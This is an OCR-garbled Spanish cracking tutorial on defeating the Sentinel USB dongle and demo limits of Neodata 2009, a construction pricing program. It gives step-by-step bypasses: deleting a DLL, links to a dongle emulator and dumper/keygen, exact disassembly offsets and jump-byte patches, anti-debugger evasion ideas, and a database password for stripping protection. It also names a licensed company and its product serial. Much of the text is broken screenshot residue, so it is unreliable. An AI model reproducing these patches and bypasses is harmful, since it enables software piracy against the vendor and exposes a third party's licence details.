- Single y licencias ilimitadas. 

- Pro versión con licencia de control avanzado. 

- Fácil de usar, interfaz de uso fácil. 

- Obras en Microsoft Windows 95 / 98 / ME / NT /2000 / XP / 2003. 
info: 


http://www neobit.or 

Neodata 2009 usa un centinel usb negro (usb morada no funciona) 

pues yo la verdad no se que tendrá de interesante este nueva version de Neodata (2009), no se que cambios de mejora realizaron, lo único que se observa es que cambiaron el icono de acceso directo la 
pantalla de acceso al sistema y los iconos del menú y ya, de hecho hay que actualizar la usb porque la del 2008 no es compatible 


LA VERSION 2009 NO LEE USB SENTINEL 2006... TENDREMOS QUE CAMBIAR LAS USB 


Si tienes una USB es morada, se debe hacer un cambio de llave a una USB negra. Si ya se tiene la USB negra y hace menos de un año de que se adquirió Neodata 2008, sólo debes solicitar vía telefónica 
que te generen tu clave para la 2009. 


para los que tienen la version demo de neodata 2009 realicen esto, en la carpeta de neodata 2009 quiten o cambien de capeta el archivo rscoree.dll despues corran el programa, aparecera un mensaje de 
error solo denle aceptar al mensaje y depues entren al programa una ves abierto el programa habran cualquier obra que sepan que va a rebasar el limite de conceptos permitidos puede ser un archivo 
maestro depues les volvera a aparecer un mensaje de error le dan aceptar y abrira el archivo completamente sin que aparesca el mensaje de que trabajara en version demo es decir que se le pueden agregar 
mas partidas modificar las matrices etc. como si estubiera totalmente liberado, e checado que solo al darle clic a calcular obra se activa la ventana de que trabajara en version demo pero antes de esto 
estube manipulando el programa sin ningun problema pero me gustaria que ustedes tambien lo checaran y comentaran si les pasa lo mismo tal ves por ahi se pueda atacar al programa y liberarlo sin 
ningun dongle. 

funciona bien, pero si se quiere accesar a alguna matriz se o al querer accesar al catalogo se vuelve al modo demo, 

Funciona tal como lo mencionan, creo que el dll está protegido con Remotesoft .NET Protector Runtime Engine, estos son los errores que aparecen: 


Error en MdiToolbar.Load: -2146233036 - Error de Automatización Linea no.: 1110 


Error en MdiTool.VerificaDemo : 91 - La variable de tipo Object o la variable de bloque With no está establecida 


Existe un Emulador SENTINEL 2007 desarrollado por la empresa neobit (y mas tarde crackeado por EDGE Team le llamarón SENTEMUL2007). 


(Podemos modificar su apariencia del emulador cambiando los textos e imágenes ,iconos ,etc, del emulador de EDGE usando el Pluging del PEiD 095 (BOB --> XN Resorce Editor ) 
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Ed SENTINEL Emulator 2007 


Emulator | Dongles | Driver 


Licensed Dongles 


 Updeteticense | License 


y Lock License 
art Service | Stop Service o _—A 


Computer ID 
SENTEMUL2007 Status — 


SENTINEL Emulator service is running 
FULL License 


Muestra el status del emulador 


ES SENTINEL Emulator 2007 


Emulator Dongles | Driver | 


carga el archivo 
DNG dumpeado 


Load Dump 


Clean Storage 


Limpia la memoria 
ram 
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3 SENTINEL Emulator 2007 


Emulator | Dongles Driver 


- Driver Startup options 


Install Driver 


(7 Automatic Start 


(% Manual Start 
Reinstall driver | 
Save State | 


Uninstall driver 


Status : Driver is installed 


Instala un driver simulando 


También tenemos el ejecutable echo por Orbit y crackeado por EDGE que volca el contenido de un dongle a un archivo DNG y asi poderlo emular con el emulador SENTINUL 2007 , 
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£ The neoBit.org solution v1.1 - EDGE 


'£_ The neoBit.org solution v1.1 - EDGE [E] E 
HASP | HASP HL] Sentinel | 


Keygen HASP | HASP HL | Sentinel | 


Dongle Type Licensed dongles - ID is HasplD-———  Dump file location 


(* HASP Browse 
C HAsP HL 

C Sentinel — DNG file location 
— License Validity Browse 
Starts at 21+08/2009 v ] 
Ends at [21 ¿08/2009 y] 


—Log 


ipos de dongles a las 
ación en un archivo * 
Generate 


£ The neoBit.org solution v1.1 - EDGE 


£ The neoBit.org solution v1.1 - EDGE E (x) 
Keygen] HASP. HASP HL | Sentinel | 


Keygen | HASP | HASP HL Sentinel | 


— Dump file location 


A Browse 


— DNG file location 


ss Browse 


Log 


 Dump and Solve 


ss Browse 


T Specify Developer ld 


— 
n— 


TT Specify Write Password 


— Log 


http://rapidshare.com/files/65295281/Sentinel_Emulator_2007_By rar 


PROTECCION INSULTANTE EL CRC32 VIENE DANDO LATA EN TODAS LAS VERSIONES : 
UN POCO DE TEORIA: 
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- ¿ Que es CRC32 ( Cyclic Redundancy Code 32 bits ) ? 


Se trata de un algoritmo estandarizado que sirve para comprobar si ha habido daños o perdidas de información. 


Dicho valor se calcula con el siguiente algoritmo: 
(CRC32 es el valor CRC32 de la información chequeada, iniciamos dicho valor con OXFFFFFFFF). 


1) Se calcula, con el byte correspondiente de la información a chequear, una determinada posición en la tabla HASH que usa el algoritmo para calcular el CRC32, de la 
siguiente forma: 


Pos = (CRC32 2 *s++) «e OXxFF. 


Es decir, la posición es el resultado de xorear el byte menos significativo del valor CRC32 con el carácter de la información. 
2) Después el entero largo sin signo contenido en esa posición se xorea con los 3 bytes menos significativos del valor CRC32. 
3) Repetimos estos dos pasos hasta utilizar todos los bytes de la información a chequear. 

4) Y para concluir el resultado final es el valor CRC32 complementado. 


Neodata 2009 quitar proteccion crc32 


El CRC32 es una rutina de protección del tipo checksum checa el contenido de todo el ejecutable ó de alguna parte especifica 
del mismo para evitar que sea alterado el ejecutable 


Existen muchas protecciones del tipo checksum 


CRC32 

MD4 

MD5S 

SHA1 
SHA-256 
SHA-384 
SHA-512 
RIPEMD-128 
RIPEMD-160 
HAVAL 256 
TIGER 192 


las cuales no mencionaremos en este tutorial debido a que solo nos interesa la proteccion crc32 que incluye el neodata 2009 


El neodata 2009 tiene una proteccion muy particular en todas sus 
compilaciones anteriores a la version 2009 

es una COMPROBACION DE REDUNDANCIA CICLICA (CRC32) 
según me muestra el PEdit con su pluggin Kriptor 


esto significa que si alteramos algo en el programa calcula el cre 


y lo verifica con el que tiene guardado si no es igual 
pues peta el programa 


¿COMO QUITAR LA PROTECCION CRC32? 
la forma mas fácil seria ir verificando donde compara con el crc guardado 
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ME PEID y0.95 


File: 'C:jArchivos de programalNeodata 2009/NEOW2009.exe liza] 
Entrypoint: |00016E94 EP Section: |,text [>] 
File Offset: [D0016E94 First Bytes: [68,6C,74,41 
Linker Info: 6,0 Subsystem: —Win32 GUI 


Microsoft Visual Basic 5,0 / 6,0 


Multi scan | Task Viewer _| Options | About Exit | 
Say ontop >] [>] sos : 


Normal Scan Enese Fa KANAL v2.92 
Decrypt DEF 
Deep Scan 


a E Decrypt UPXShit 
IEANAA ea EPScan [2 CRC32 [poly] :: OOTE15BE :: DOBE1SBE 


External Scan Generic OEP Finder The reference is above. 


File ls de programalNeodata 2009NEOW2009,exe 


PEiD Generic Unpacker 
Quick ChSum 

Rebuild PE 

Send spy 

Units browser 


Unpacker for FSG v1,33 a | EROraN A 


Unpacker For UPX 
Unpacker For UPolyx Detected 1 crypto signature (in 3.4s) 


eCrap oep veriFy 


Serie del producto: 27460 
Versión monousuario 


ODATA 


[V17M2008R60) 
Versión: 04/Jul*2008 il 
AL 


CONSTRUCTORA INSURGENTES DE CHILPANCINGO, S.A. DE C.V. 


En caso de dudas Nombre: [NEO 


comunicarse al 


[55] 52-78-38-50 Contraseña: | Cancelar 


Usando el emulador de motxila creado por el grupo SCT team, lograron que el programa funcionara sin ninguna limitación, después de notar esta falla por la casa de software, crearon otra compilación 
2008 y despistaron a la gente porque dejaron el mismo nombre de la compilación, y para ese mismo año , el emulador ya no funcionaba correctamente, hasta antes de la compilación V17M2008R60, todo 
sin problemas, para la version 2009 el emulador ya no funciona, o tal vez sera que han banneado a tal empresa de constructora insurgentes de chilpancingo, S.A de C.V' y hasta problamente puede que 
funcione el emulador de motxila 2008 
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= fcerca de Neodata... (X| Derechos reservados 


Serie del producto: 27460 
Versión monousuario 


Neodata (r) Precios unitarios 2008 (W17M2008R60) 
México Distrito Federal, a 25 de septiembre de 2002 A 


MNODATA CONTRATO DE LICENCIADE USUARIO FINAL DE 


Aceptar LN BRECIOS y SOFTWARE DE NEODATA 
m TS IOS 


Lea detenidamente este Contrato de Licencia de Usuario Final 

de Software Heodata en adelante denominado ("CLUFSH"”, 

constituye un acuerdo legal entre usted (sea persona física o 

persona jurídica) y NEODATA, S.A. DE C.V. en adelante 

denominada Heodata, respecto al PRODUCTO SOFTWARE 

Heodata, que incluye el software, el dispositivo de protección 

físico HARDWARE LOCK, las bases de datos de información, 

los medios asociados, materiales impresos y documentación 3 
Tin TWARF 


Info. del sistema... -| 


oDATA. 
Integra, controla y crece. 


HL UA 


CONSTRUCTORA INSURGENTES DE CHILPANCINGO, S.A. DE CY. 


Se autoriza el uso de este producto a: 


CONSTRUCTORA INSURGENTES DE CHILPANCINGO, S.A. 
DE CY. 
Serie del producto: 27460 


En caso de dudas comunicarse al (55) 52-78-38-50 


[Y17M2008R60) 
Wersión: 044Jul/2008 


Aceptar 


El emulador parece funcionar correctamente, solo en la version neodata 2008 compilacion 04 Julio 2008 


La versión con la que funciono correctamente el emulador motxila era un paquete Ejecutable que pesaba unos 353,422 Kb 


Eueodata Precios 2008 Build 04 Julio 2008 361,673 KB 
Blueodata Precios 2008 Build 04 Julio 2008 (Solo esta Funciona Bien Con Emulador) 353,422 KB 
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a Ver E Herramientas Presupuesto Ventana E 


JU ld a Ao ida rx) 
4 pdas 


A Presupuesto + 


PRA 

¿3 A01 

3 A02 

3 A03 

3 ADA 

E A05 
e: Ko: 

3 Co1 

3 C02 

¿8 C03 

3 C04 
23D 

¿3 DO1 

¿3 DO2 


a a 
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PONE 


INMENSA EEE ESMERO 
25 9 1,3114: 5 ta 3 


Suministro, fabricacion y colocacion + 


000 . 


Suministro, fsbricación ny eleccion: , 


“SO10-$ 


..: 08335 SE ra -. 
Y 


y " 


cr py 
ELSA GIE AULA! 


PERIS PATA 
AU 100, Lo 1911 255 IOMA CTI 


y y 
Surninistro, fabricación y Eracin , 


Suministro, fabricación colocación , 


SE-22:H12 7 Ibeas: 22008 
pza 


00 
$17 640.81 


$11.084 50/00) | 


UT 
dee 
: els 


O 


a 
ALLE 


57m e ministro, cabicacn colocación 
- captarár: 50 concé 
- el ' 


, E. € SAA 
SE-22-H21 78 prog fabricación y colocación + 


Suministro, fabricación y colocación + 


AA 
E Eon 450 = pp 
SNA) FALLA NAO 
E A A e VAN 
[| $380246|  $3422214] "*" foo | 
plas E E 
E $9,116.04 0.00 
DO 


iS 


sE A 
- 


” 


Suministro, fabricación colocación , 


SE-22H23 7 e an a — 30 


$7. 321.81 que 62 [os MIS 1-7] 


$7,291.98| —  $21,875.94 


100.0009 
dll 


$1,781.92 $3,563.84 do 00 
0 $2,262.11 ESE O [0.00 
A 32262 
Ac 


) RET AIL TENIENDO LA LLAVI 
CHILA CENTINELA 


a Y 


Efectivamente la version Emulador sentinela (Motxila, llave, Dongle ó como le quieran llamar) , no habia limitacion en cuanto la captura de conceptos. 
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DESPUES DE UN BREVE REPASO DE HISTORIA CONTINUAMOS CON EL NEODATA 2009 


Una vez instalado el programa veremos la siguiente ventana 


[(V18M2009R 23) 


N a] oO O NT A Versión: 19/Ene*2009 
od 


Precios Unitarios 2002... 


L> 


En caso de dudas Usuario: [NEO 


comunicarse al A 
(55) 52-78-38-50 Contraseña: | Cancelar 


Nota: El usuario default del sistema es "NEO" y no tiene contraseña. 


En el Menú About de esta aplicación vemos que también nos esta recordando que esta es una versión demo 


+ Acerca de Neodata 


1418M2009R23] 


N = O a] NT A d Versión: 19/Ene/2009 
Precios Unitarios 2009 . 


Info. del sistema... 


En caso de dudas comunicarse al (55) 52-78-38-50 A no 


Derechos reservados 


Neodata (1) Precios unitarios 2009 (18M2009R23) 


CONTRATO DE LICENCIA DE USUARI 
SOFTWARE DE NEODAT. y 


eni r 
ware 

uye un 

denominada Heodata, respecto al ANÚDUCTO SOFTWARE 
Heodata, que incluye el sofi , el dispositivo de protección 
físico HARDWARE LOCK; es de datos de información, 


los medios asociados, ales impresos y documentación 


elertránica (“PRAMICT: FTMWARE'S FlLPRANIECTA SAFTIWARF vi 


in 
ersión de demostración y pruebas del sistema 
Serie del producto: O 


Aceptar | 


Cargamos el RDG Packer Detector de Protecciones PE y vemos que aunque el Neodata 2009 tiene proteccion Antidebugger no lo 


muestra, esta oculto 
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RDG Pucker Detector , 


Autor: 
Versión: 


WWW: 


ROME ACKer DelecÍor VO. os =)x) 


CiMárchivos de programaNeodata 2009 NE0W2009 exe Abrir | 


o 
Visual Basic 6.0 Código Nativo Compilador 


Nada Detectado 


A 
Contacto : Al Frente [] 


Drigen Lenguaje: Hispano Y da 1") Detectar 


0 Axchivo Escaneado en 38.92 5eg. O MA € M 


Escaneo Externo (Mediante DIl Actualizablé) -,%) 


Detectado: 


Posible: — Archivo Sospechoso f Suspicious File 
Contacto: 


Última Actualización: 11 de Noviembre del 2008 (2) 


Analizando con 2 computadoras 1 con Neodata 2008 con su emulador centinela funcionando al 100%, y en otra computadora 
sin el emulador con versión demo 
En ambas cargamos el Ollydbg y el neodata 2008 (En todo este proceso trabajaremos simultaneamente) 


Si intentamos cargar el Neodata con el ollydbg este bloquea el debugger en el 85.5% del archivo, presionemos la barra espaciadora cuando vallamos al 80% hay tendremos suficiente código vivo para 
realizar el análisis de este ejecutable , antes de este porcentaje a ver que pasa, ya entramos en el código vivo , presionamos F7 


Al cargar un catalogo con demasiados conceptos nos aparece un mensaje de que el programa entrara en modo visor 


Mientras estaba escribiendo este tutorial y no presione en la NAG el ACEPTAR apareció otra ventana después de mostrar la primer NAG, en un lapso de 53,56,58,60 segundos según el 
cronometro en mano, 


Estadísticas al abrir un catalogo que rebase el limite de líneas permitido no siempre muestra al mismo intervalo de tiempo 
se muestra la segunda ventana en: 


53 segundos,56 segundos,58 segundos 


En teoría eso da ha entender que probablemente se esta utilizando la variable de tiempo en el kernell de Windows para comprobar si la llave Física esta colocada en alguna de las ranuras USB, mmmhhh 
esto me recuerda al antiguo 3D Studio Max 3.0 Cuando se vendía con Motxila 


Aceptar 


Neodata 2009 


A Demasiados registros para la versión demo. Se trabajaren modo visor. 


Aceptar 


Al mostrar una segunda ventana significa que checa 2 veces si esta colocada la motxila ó sentinela en nuestros puertos usb, ó se llama 
a una segunda rutina que comprueba la existencia de esta 


Al abrir un catalogo con suficientes conceptos, solo mostrara algunos y no nos dejara seguir capturando mas 
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+4 E 


E 


+) [e] [+] 


E 


Es hora de cargar el PEid v0.95, en este cargamos el pluggin Kriptor , esto es lo que veremos 
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Suministro, fabricacior 
Suministro, fabricacior 


Suministro, fabricacior 
Suministro, fabriggm 


Suministro, £abridhg 
go aciór 


[SE-Z2-H0% MR Sulfigistrik fabricación 


'Sumiitro; fabricaciór 


Mabricaciór 


eijo, Lricaciór 


la 


Y 
Upa 


al 
strOfflabricaciór 


bib, Fabricaciór 
umiéistro, fabricaciór 
uministro, fabricaciór 
Suministro, fabricaciór 
Suministro, fabricaciór 


Suministro, fabricaciór 
Suministro, fabricaciór 


Suministro, fabricaciór 
Suministro, fabricaciór 
Suministro, fabricaciór 
Suministro, fabricaciór 
Suministro, fabrigacior 


Suministrg 1Ór 


KANAL y2.92 


To File » 
To Clipboard »| List of Items with References 


IDC Script - Boomarks 
IDC Script - Comments 
IDC Script - Bookmarks and Comments 


Parte de la solucion fué proporcionada por +ErOser//PROXY 


NEOV2009. exe 
Lenguaje : Visual Basic 6 
Proteccion : Dongle Sentinel 


Estos son los cambios k hay k realizar para quitar el mensaje de que es una version dervwo 


Patch3s New Byte Offset 
ARRE R  dRd kk lok ke 
0095FF31 /75 OE J] NZ SHORT 0095FF41 55FF31h 

009602BC /0F85 63070000 JNZ 00960425 5602BCh 

00B6F120 /75 21 J] NZ SHORT 00B6F143 76F120h 

00B6F123 | 74 3A JE SHORT OOB6F15F 76F123h 


Un saludo 
+ErOser//PROXY 
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* Reference To: M5VBVIM6O. __vbaFreeVar, Ord: 0000h 
:0095FF28 FF1534104000 Cal | dword ptr [00401034] 
:0095FF2E 663BFE cmp di, si 

<----- Cambi ar "74" por "75" 
:0095FF33 C745FC08000000 rrvov [ ebp- 04], 00000008 
: OO95FF3A 66891DB0839001 mov word ptr [O19083B0], bx 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|: 0O95FF31( C) 
: 0095FF41 C745FC09000000 rrvov [ ebp- 04], 00000009 
:0095FF48 6A32 push 00000032 
:0095FF4A 8D45A0 lea eax, dword ptr [ebp- 60] 
:0095FF4D 50 push eax 


Cortamos código hasta.... 


* Reference To: M5VBVIM6O. __vbaHresul t CheckObj, Ord: 0000h 
|: 0O9602A7 FF15B0104000 Call dword ptr [004010B0] 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| : 0O960296( C) 
|: O0O9602AD C745FCOFOO00000 rrov [ebp- 04], 0000000F 

: 009602B4 66833DB083900100 cmp word ptr [019083B0], 0000 

<-=-=-=--- Cambiar "je 0x84" por "jne 0x85" 

: 009602C2 C745FC10000000 rrov [ ebp- 04], 00000010 

: 009602C9 6A56 push 00000056 

:009602CB 8D45A0 lea eax, dword ptr [ebp- 60] 

:009602CE 50 push eax 

:009602CF FFD6 call esi 

:009602D1 6A65 push 00000065 


Cortanwos código hasta.... 


: OOB6F10F FF1508124000 Call dword ptr [00401208] 
:00B6F115 8B5510 nov edx, dword ptr [ebp+10] 
:00B6F118 8BC8 nov ecx, eax 
: OOB6F11A 8B02 nov eax, dword ptr [edx] 
: OOB6F11C 48 dec eax 
:00B6F11D 894DE0 nov dword ptr [ebp- 20], ecx 
<---- Cambi ar "je 0x74" por "jne 0x75" 
:00B6F122 48 dec eax 
<-=-=-- Cambiar "jne 0x75" por "je 0x74" 
:00B6F125 C745D80000E0F3 mov [ ebp- 28], F3E00000 
: 0OB6F12C C745DC445DE841 mov [ebp- 24], 41E85D44 
: 00B6F133 C745D00000401E mov [ebp- 30], 1E£400000 
: OOB6F13A C745D42324D141 rov [ebp-2C], 41D12423 
: 00B6F141 EB1C jnmp OOB6F15F 


Abrimos UltraEdit-32 v10 ó el editor hexadecimal que tengamos ¡instal ado 
o ——— —5 
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CE EH 
894DE07421 Ig AAA AAA 
A 


Bien, abrirwos el neodata y esto es lo que aparece 


[418M2009R 23] 


N = O |] MT AÑ A Versión: 24/Mar/2009 


Precios Unitarios 2009 .., 


En caso de dudas Usuario: ÍNEO 10 
comunicarse al - 
(55] 52-78-38-50 Contraseña: | Cancelar í 


Nota: El usuario default del sistema es "NEO" y no tiene contraseña. 
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o Ácerca de Neodata... 


[Y18M2009R 23] 


N = oO O MNT A A Versión: 24/Mar/2009 


Derechos reservados Info. del sistema... 


En caso de dudas comunicarse al (55) 52-78-38-50 


Derechos reservados 


Neodata (1) Precios unitarios 2009 (v18M2009R23) 


*Otras responsabilidades. Neodata no adquiere de manera 
explícita ni implícita ninguna otra responsabilidad, por lo que al 
aceptar el presente "CLUFSN", usted acepta que cualquier prejuicio 
o daño que usted o sus asociados sufran por instalar o usar el 
PRODUCTO SOFTWARE será única y exclusivamente 
responsabilidad de usted. 


Por Neodata, S. 4. de C. Y. 


oODrNTA. 


Guadalupe Corina Mancilla Ruiz 
Representante legal 


Integra, controla y crece. 


Se autoriza el uso de este producto a: 


Serie del producto: O 


Aceptar 


Se observa que el programa sigue detectando la motxila al cargar un catalogo con suficientes conceptos, al parecer solo desaparecieron los carteles de que es una versión demo pero segue siendo una 
version limitada 


Abrimos el neodata , cargamos los catálogos máster que se incluyen en el propio neodata y vemos que no se pueden cargar 


Buscar en: | Maestros... e] e eE» 


— [2% Dacumentas recientes | 1 
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€] Escritorio 


Mis d [ 
pra 3 o Os 
recientes ut 
3 Disco de 3% (4:) 
(3 s Disco local (C:] 
e (5 Archivos de programa 
Ba (E) Neodata 2009 


5 dm aestros 
- B Disco local (D:] 
E is Backup HD (E:] 
Mis documentos | 22 Unidad DVD-RAM (F:] 
2 DVD RW Samsumg (G:) 
“se CompatFlash (H:] 
] “se MicroSD (J:) 
MiPC “e MemoryStick [K-] 
“se Disco extraíble (L:] 


a Mis sitios de red 
Mis sitios de red — Tipo: [Archivos 2009/2008 y 2004 y] Cancelar 


[Abrir como archivo de sólo lectura 


Buscar en: [E Maestros... e] e Ae E 


Nombre + Tamaño Tipo Fecha de 


(5) Intelimat de usuario Carpeta de archivos 11/03/20 

E rorbcriaa (5) Intelipre de usuario Carpeta de archivos 11/03/20 
(Maestro de usuario Carpeta de archivos 11/03/20 

(4 LL COTIZADOR ENERO 2009 35,108 KB Precios Unitarios 2009 06/04/20 
ESSÑOno e COTIZADOR REGIONES ENE 09 37,860 KB Precios Unitarios 2009 04/04/20 


e VIVIENDA Y URBANIZACION 11,544KB Precios Unitarios 2009 30/03/20 


| 3) 


./ Nombre: [COTIZADOR ENERO 2009 y] 
Mis sitios de red — Tipo: [Archivos 2009/2008 y 2004 y ] Cancelar 


[Abrir como archivo de sólo lectura 


Neodata 2009 


A Demasiados registros para la versión demo. Se trabajará en modo visor, 


Aceptar 


Neodata 2009 


A Demasiados registros para la versión demo. Se trabajará en modo visor. 


¿Que es el cotizador de neodata? 


Es un ejecutable que se puede descargar de la web de neodata, como requisito piden registrarse, una vez descargado ,nos proporcionan la ultima actualización de precios unitarios es mensual 


o hay que actualizar a la ultima versión de neodata (Eso es lo que yo creia hasta que descubri 
on Neodata 2008) 


la carpeta de neodata en la ruta: 


 Neodata 2009 
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1H Archivo Editar Buscar Proyecto Yer Formato Columma Macro Awamzado Ventana Ayuda 


les OS AIN A WM ¡2ls 


e E a| 


=s ==) RA IBAA AA 


| Editar! | 


Documentos 
recientes 


[E 


Escritorio 


Mis sitios de red 


Si necesita ayuda, pulse F1 


Buscar en: la My Downloads y] e ex Ed” 


Nombre 
EF]ImTOO 36P Video Converter 3 
E2]imToO DYD Ripper Platinum 
¿EP]Multimedia Software Develop... 
E musICMATCH Jukebox 

» al 

NEOW2008.wpj 
B omniPage[1].Professional.v1 00d 


EXPalm 056 Emulator 

EJreo 

EProcdump32 

¡EP]Programa de reemplazo de ba... 
IA9]Programa de reemplazo de ba... 


Fano nacloe Maboctar da Menk 


JU 


Tamaño 
1KB 
1KB 

114KB 
2KB 
499,447 KB 
13,003 KB 
100,000 KB 
1KB 

1KB 

1KB 

54 KB 

214 KB 


1vD 


Tipo 

Acceso directo 
Acceso directo 
MHTML Document 
Acceso directo 
Archivo ALF 
Archivo WPJ 
Archivo WinRAR 
Acceso directo 
Acceso directo 
Acceso directo 
MHTML Document 
MHTML Document 


Bernen dieneka 


[Abrir como archivo de sólo lectura 


Guardamos el archivo desensamblado con wdasm32, el archivo con la extension .alf 
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Nombre: — [NEOw2008 y] 
Tipo: [Todos los archivos, [*.*] y] Cancelar 


Lín, 1, Col. 1, CO 


Mod.: 27/05/2009 02:41:50p.n 


vemos que hay partes del desensamblado que parecen irreconocibles, abramoslo con ultraedit 32 a ver que pasa 
comparativa, increible el ultraedit ha ordenado el codigo desensablado irreconocible, me pregunto si pasara lo mismo al debuggear el ejecutable, y es en esta parte donde se traba el debugger 


vemos la siguiente comparativa 
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132 URSoft W32Dasm Ver 8.93 Program Disassembler/MDebugger 


Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


ET 
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A archivo Editar Buscar Proyecto Yer Formato Columma Macro Avanzado Ventana Ayuda 
é¿3)D0D865 011864 /W ¡0 Ss 2¿Ble == 8 |fi0186EFFDS > 


[| NEOW2008.al' | 


:01018670 
:01018672 
:01018678 
:01018679 
:0101867B 
:0101867D 
:01018683 
:01018684 
:01018686 
:01018688 
:0101868E 
:0101868F 
:01018691 
:01018693 
:01018699 
:01018691 
:0101869€ 
:0101869E 
:010186144 
:01018645 
:01018647 
:01018649 
:0101864F 
:010186B0 
:010186B2 
:0101586B4 
:010186B1 
:010186BB 
:010186BD 
:010186BF 
:01018605 
:01018606 
:01018608 
:010186CA 
:010186D0 
:010186D1 
:010186D3 
:010186D5 
:010186DB 
:010186DC 
:010186DE 
:010186E0 
:010186E6 
:010186E7 
:010186E9 
:010186EB 
:010186F1 
:010186F2 
:010186F4 
:010186F6 
:010186FC 


6431 
S8DSDOOFCFFFF 
51 

FFD6 

6430 
SD9SEOFEFFFF 
52 

FFD6 

6143 
B8DS5COFBFFFF 
50 

FFD6 

6145 
SDSDAOFBFFFF 
51 

FFD6 

6143 
S8D95SBOFEFFFF 
52 

FFD6 

6430 
S8DS560FBFFFF 
50 

FFD6 

61431 
8DS8D40FBEFFFF 
51 

FFD6 

6134 
8D9520FBFFFF 
52 

FFD6 

6138 
S8DS8500FBFFFF 
50 

FFD6 

6143 
SDSDEOFAFFFF 
51 

FFD6 

6146 
B8D95COFAFFFF 
52 

FFD6 

6146 
SDSSAO0FAFFFF 
50 

FFD6 

6138 
S8DSDSOFAFFFF 
si 


Si necesita ayuda, pulse F1 


ANEOW 2008.alf] 


caollesT 


push 00000031 


lea ecx, 
push ecx 
call esi 


push 00000030 


lea edx, 
push edx 
call esi 


push 00000043 


lea eax, 
push eax 
call esi 


push 00000045 


lea ecx, 
push ecx 
call esi 


push 00000043 


lea edx, 
push edx 
call esi 


push 00000030 


lea eax, 
push eax 
call esi 


push 00000031 


lea ecx, 
push ecx 
call esi 


push 00000034 


lea edx, 
push edx 
call esi 


push 00000038 


lea eax, 
push eax 
call esi 


push 00000043 


lea ecx, 
push ecx 
call esi 


push 00000046 


lea edx, 
push edx 
call esi 


push 00000046 


lea eax, 
push eax 
call esi 


push 00000038 


lea ecx, 
push ecx 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


ptr 


[ebp+FFFFFCOO] 


[ebp+FFFFFBEO] 


[ebp+FFFFFECO] 


[ebp+FFFFFBAO] 


[ebp+FFFFFB80] 


[ebp+FFFFFE60] 


[ebp+FFFFFB40] 


[ebp+FFFFFB20] 


[ebp+FFFFFBO0] 


[ebp+FFFFFAEO] 


[ebp+FFFFFACO] 


[ebp+FFFFFAAO] 


[ebp+FFFFFAS0] 


perfecto, parece que ahora si podremos continuar trabajando aunque sea con el codigo muerto, unque tendremos que trabajar con el 


ultraedit 32 de aqui en adelante para ir viendo el codigo desensamblado, por que ya vimos que el wdasm32 no reconoce el codigo correctamente 


En el caso de las motxilas HASP, dependiendo del modelo: 
-HASP-4, HASP3 


-MemoHASP 


-HardLock E-y-E 
... etc 


Para las motxilas HASP usar los siguientes comandos al debuggear: 


Servicio 1 (01h) : ISHASP() - SI la HASP esta conectada al PC 
Servicio 5 (05h) : HaspStatus() - COMPRUEBA el modelo de HASP, si devuelve el valor 


O - HASP-3 o HASP4 sin memoria 

1 - MemoHASP-1, MemoHASP-4, HASP4 M1, HASP4 M4 
3 - TimeHASP 

5 - TimeHASP-4 or HASP4 Time 


etc... 


Seria bastante largo de explicar todas las funciones que tienen las jodidas motxilas. 


¿COMO QUITAR PROTECCION ANTIDEBUGGER? 


Se me ocurre que tal vez detecte el antidebugger por las llamadas a ring 3 que se hacen, el phanton se ocupaba de ocultar, algunos programas comerciales como el themida tienen formas de encontrar el 
antidebugger haciendo interrupciones de ring O 
verifican ciertos valores de las apis y con ello se dan cuenta que estan siendo depurados, cambiando las banderas se podria saltar la proteccion, se necesita saber que banderas cambiar. 


no creo que la rutina de este al inicio del programa, por lo general la ponen al medio y en otro hilo cuando intentas hacer algo zas el otro hilo se da cuenta se despega muchos hilos podras intentar parandolos y 
viendo si sigue detectandolo 


puede que desde el hilo principal verifique que estan los hilos corriendo 


COMENTARIOS SOBRE EL CRACK DE NEODATA 2009 


Una Vez de haber burlado la protección mochila+harware 


Estare pensando que: 


Las mochilas como objeto de estudio esta bien, el objetivo de todas las versiones del Neodata hasta la 2010. He de decir que me ha defraudado bastante el sistema de protección, parece más una broma que no 


otra cosa. En menos de media hora puedes crackear el programa, es ridiculo, incluso he tardado mucho más en escribir este tutorial. Hasta se puede prescindir de herramientas para debuggear y para crackear 
el programa, con sólo usar el |DA y un poco de inteligencia habriamos llegado al crack final. 


Me parece patético.He encontrado muchas aplicaciones shareware mejor protegidas y además sin que estas utilizen ningún tipo de mochila. Esto me lleva a pensar el dinero que gastán en mochilas, para luego 
proteger de esta manera, es extraño que tan preocupados que son ellos para el dinero, no se den cuenta de cómo lo están tirando. 


Me sentiría muy avergonzado si malgastara mi dinero en un software que está protegido de tal manera y además resulta tan caro. 


De nuevo se demuestra que no importa lo caro que sea un programa, la vagancia de los programadores (en este caso de Neodata se pone de nuevo de manifiesto. A veces intento dar una explicación al porqué 
de estas inofensivas protecciones, quizás son las prisas por sacar cuanto antes una nueva versión, 


o quizas no protegen mejor para que su software sea crackeado rápidamente y se convierta así en el más utilizado (curiosa técnica de marketing), 
no se, no entiendo el porqué... sólo se que alguien dijo: es una mala protección, entonces es 


un mal programa y es entonces un software mal protejido. 
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NEODATA 2009 


Error 53 en linea: O (No se ha encontrado el archivo: SentinelKeyW.dll) en el procedimiento CalCostoHorario de Módulo de clase CalCostoHorario 


Neodata 2009 


nuevo el programa. 


(X) La base de datos C: Archivos de programalMNeodata 2008/4cceso2009.mdb no existe, Restaure la base de seguridad en este directorio y ejecute de 


Si borramos las librerias dinamicas contenidas en el directorio raiz del neodata 2009 , son los errorres mostradosque vemos arriba 


abria que echar un vistazo a estas dlls 


NOTA IMPORTANTE: SE PUEDE CARGAR LA BASE DEL MAESTRO DEL NEODATA 2009 AL NEODATA 2008, LO UNICO QUE HAY QUE HACER ES ABRIR EL MAESTRO QUE QUERRAMOS CON MICROSOFT ACCESS 
2007 Y LE QUITAMOS LA CONTRASEÑA Y LO GUARDAMOS NUEVAMENTE COMO ARCHIVO DE ACCESS SIN PASSWORD POSTERIORMENTE LE CAMBIAMOS LA EXTENSION POR *.PU6 Y LISTO, EL PROBLEMA ES 
QUE DEBEBEMOS DE QUITAR LA CONTRASEÑA POR QUE EN NEODATA 2009 SE DEBE DE ABRIR LA BASE DE DATOS CON UN PASSWORD "kotisador2009" , AHORA SOLO BASTA CON COPIAR 


